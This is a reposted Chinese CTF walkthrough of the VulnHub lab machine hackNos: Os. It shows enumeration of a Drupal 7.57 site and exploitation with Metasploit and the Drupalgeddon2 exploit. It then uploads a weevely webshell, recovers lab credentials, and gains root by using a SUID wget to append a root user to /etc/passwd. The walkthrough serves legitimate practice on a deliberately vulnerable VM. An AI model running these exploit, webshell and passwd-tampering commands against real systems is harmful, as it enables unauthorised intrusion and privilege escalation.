VulnHub-hackNos: Os

admin 2023年6月16日09:02:01评论17 views字数 2010阅读6分42秒阅读模式

大余安全  

一个每日分享渗透小技巧的公众号VulnHub-hackNos: Os



大家好,这里是 大余安全 的第 52 篇文章,本公众号会每日分享攻防渗透技术给大家。


VulnHub-hackNos: Os

靶机地址:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/

靶机难度:中级(CTF)--本人做完觉得是初级!!

靶机发布日期:2019年11月27日

靶机描述:

Difficulty : Easy to Intermediate

Flag : 2 Flag first user And second root

Learning : exploit | Web Application | Enumeration | Privilege Escalation

Website : www.hackNos.com

mail : [email protected]


请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

VulnHub-hackNos: Os



一、信息收集


VulnHub-hackNos: Os


VulnHub-hackNos: Os

我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址:

VulnHub-hackNos: Os

我们已经找到了此次CTF目标计算机IP地址:192.168.56.143

VulnHub-hackNos: Os

nmap发现开放了22、80端口...

VulnHub-hackNos: Os

80是个apache2...爆破看看...

VulnHub-hackNos: Os

发现drupal...

VulnHub-hackNos: Os

这边利用Droopescan进行扫描(Droopescan是一款基于插件的扫描器,可帮助安全研究人员发现Drupal,SilverStripe,Wordpress,Joomla(枚举版本信息和可利用URL地址)和Moodle的问题)

这边当然也可以用dirb,dirbuster等等,Droopescan比较好针对drupal...[安装连接](https://github.com/droope/droopescan)

VulnHub-hackNos: Os



二、提权


VulnHub-hackNos: Os




方法1:





drupal7.57的版本...

两种方法:一种直接利用MSF,一种利用python脚本...

VulnHub-hackNos: Os

MSF内核直接拿到shell...





方法2:




VulnHub-hackNos: Os

git clone https://github.com/dreadlocked/Drupalgeddon2.git

先在github上下载该exp...如果执行和我一样报错,需要下载`

gem  install highline` 因为在运行该exp前,需要预装依赖包highline...看下图

VulnHub-hackNos: Os

VulnHub-hackNos: Os

成功获得www-data权限,但是这里想获得TTY必须利用木马工具...

VulnHub-hackNos: Os

weevely generate cmd ./xiaoma.php

生成木马...然后上传上去即可...

VulnHub-hackNos: Os

VulnHub-hackNos: Os

weevely http://192.168.56.143/drupal/xiaoma.php cmd

成功...




方法3:




直接在链接下载py,利用python3即可提权...

https://www.exploit-db.com/exploits/44448python3 -c 'import pty; pty.spawn("/bin/bash")'

获得TTY...不演示了...


VulnHub-hackNos: Os

成功获得user...

VulnHub-hackNos: Os

在html页面目录发现了alexander.txt...

VulnHub-hackNos: Os

一看就知道base64编码,解码...

这是brainfuck加密后的字符串...解码...

VulnHub-hackNos: Os

[解码链接](https://www.splitbrain.org/services/ook)james:Hacker@4514

我尝试在数据库看看能不能也找到密码...试试

VulnHub-hackNos: Os

发现数据库用户密码:

cuppauserAkrn@4514

VulnHub-hackNos: Os

这儿也能看到,但是无法解析...跳过

find / -perm -u=s -type f 2>/dev/null

VulnHub-hackNos: Os

这里可以wget和sudo,但是sudo -l 需要密码...这里直接利用wget替换本地的passwd即可提权root...试试

VulnHub-hackNos: Os

openssl passwd -1 -salt dayu dayuecho 'dayu:$1$dayu$/Cg/PH1Ew3w37.fLDfjX8/:0:0:root:/root:/bin/bash' >> /etc/passwd

在本地生成root权限用户dayu...开启本地服务

VulnHub-hackNos: Os提权即可..

VulnHub-hackNos: Os

成功获得root权限并查看两个flag...


VulnHub-hackNos: Os

当然方法很多种,千变万化,理解原理即可!!!加油!!!


由于我们已经成功得到root权限查看flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。


如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

VulnHub-hackNos: Os


如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

VulnHub-hackNos: Os
VulnHub-hackNos: Os


VulnHub-hackNos: Os


欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

VulnHub-hackNos: Os

大余安全

一个全栈渗透小技巧的公众号

VulnHub-hackNos: Os

原文始发于微信公众号(大余安全):VulnHub-hackNos: Os

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月16日09:02:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VulnHub-hackNos: Oshttp://cn-sec.com/archives/891885.html

发表评论

匿名网友 填写信息